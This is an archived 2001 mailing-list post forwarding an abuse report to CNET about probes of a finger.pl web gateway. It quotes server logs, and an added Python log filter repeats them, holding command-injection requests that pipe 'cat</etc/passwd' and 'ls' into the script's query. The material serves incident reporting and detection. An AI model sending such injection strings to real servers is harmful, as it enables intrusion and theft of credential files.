(no subject)

From: Len Sassaman (rabbiat_private)
Date: Wed May 09 2001 - 16:41:19 PDT


    I sent the following email to several CNET contacts last week regarding
    attempts to obtain one of my server's /etc/passwd file. I got no response
    from CNET, and I am curious to know if anyone else is being probed in this
    way.
    
    --Len.
    
    ---------- Forwarded message ----------
    Date: Thu, 3 May 2001 12:42:45 -0700 (PDT)
    From: abuseat_private
    To: hostmasterat_private, domain-adminat_private
    Cc: sashapat_private
    
    Dear CNET Admins,
    
    It appears that a user on your network is attempting to exploit a
    vulnerability in HTTP-to-finger gateways. I discovered, in the below
    quoted logs, what looks to be an attempt to get our webserver to execute
    local commands and print the output to the web page. (Your user searched
    google.com for the finger.pl script, then attempted to view our passwd
    file and directory listings, ostensibly so that he could crack legitimate
    users' passwords and gain shell access to the system.)
    
    While this individual was not successful in his attempt on our system, he
    may be doing this to other systems as well.
    
    Please let me know what action you are taking to prevent this from
    occurring in the future. Also, please preserve all logs, IP assignments,
    and other data you have pertaining to this incident while it is being
    investigated. I would appreciate a response today, if possible.
    
    Thank you,
    
    Len Sassaman
    
    
    
    86-241.cnet.com - - [02/May/2001:17:15:11 -0700] "GET /cgi-bin/finger.pl?rabbi HTTP/1.1" 200 37040 "http://www.google.com/search?as_q=&num=10&btnG=Google+Search&as_epq=finger.pl&as_oq=&as_eq=&as_occt=url&lr=&as_dt=i&as_sitesearch=&safe=off" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
    86-241.cnet.com - - [02/May/2001:17:15:23 -0700] "GET /cgi-bin/finger.pl? HTTP/1.1" 200 357 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
    86-241.cnet.com - - [02/May/2001:17:15:40 -0700] "GET /cgi-bin/finger.pl?|cat</etc/passwd HTTP/1.1" 200 189 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
    86-241.cnet.com - - [02/May/2001:17:15:47 -0700] "GET /cgi-bin/finger.pl?;cat</etc/passwd HTTP/1.1" 200 189 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
    86-241.cnet.com - - [02/May/2001:17:15:56 -0700] "GET /cgi-bin/finger.pl?|ls HTTP/1.1" 200 176 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
    86-241.cnet.com - - [02/May/2001:17:16:10 -0700] "GET /cgi-bin/finger.pl?user@host HTTP/1.1" 200 140 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
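
Added example, not part of the original message: a small log filter that answers the poster's question ("is anyone else being probed in this way") by flagging requests to a finger gateway whose query string carries shell metacharacters. The function name, the metacharacter set and the sample lines (including the placeholder host client.example.net and the URL-encoded variant) are assumptions made for this illustration.

```python
import re
from urllib.parse import unquote

# Apache combined log format: host ident user [time] "request" status bytes ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)
# Characters the shell treats specially; a finger "user" or "user@host"
# argument has no legitimate use for any of them.
SHELL_META = re.compile(r'[|;&<>`$(){}\\\n]')

def suspicious_requests(lines, script="/cgi-bin/finger.pl"):
    """Return (host, time, decoded_query, status) for each request to
    `script` whose query string contains a shell metacharacter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable request line
        path, _, query = m["target"].partition("?")
        if path != script:
            continue
        decoded = unquote(query)  # also catches %7C, %3B and similar encodings
        if SHELL_META.search(decoded):
            hits.append((m["host"], m["time"], decoded, int(m["status"])))
    return hits

# Constructed sample lines modelled on the log above (host is a placeholder).
PRE = 'client.example.net - - [02/May/2001:17:15:'
UA = '"-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"'
SAMPLE = [
    f'{PRE}11 -0700] "GET /cgi-bin/finger.pl?rabbi HTTP/1.1" 200 37040 {UA}',
    f'{PRE}40 -0700] "GET /cgi-bin/finger.pl?|cat</etc/passwd HTTP/1.1" 200 189 {UA}',
    f'{PRE}47 -0700] "GET /cgi-bin/finger.pl?%3Bcat%3C/etc/passwd HTTP/1.1" 200 189 {UA}',
    f'{PRE}56 -0700] "GET /cgi-bin/finger.pl?|ls HTTP/1.1" 200 176 {UA}',
    f'{PRE}59 -0700] "GET /index.html?a|b HTTP/1.1" 200 512 {UA}',
    f'{PRE}10 -0700] "GET /cgi-bin/finger.pl?user@host HTTP/1.1" 200 140 {UA}',
]

if __name__ == "__main__":
    for host, when, query, status in suspicious_requests(SAMPLE):
        print(f"{when} {host} status={status} query={query!r}")
```

Every request in the quoted log returned 200, so the status code alone does not separate the probes from ordinary lookups; the decoded query string does.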
    



    This archive was generated by hypermail 2b30 : Thu May 10 2001 - 17:02:32 PDT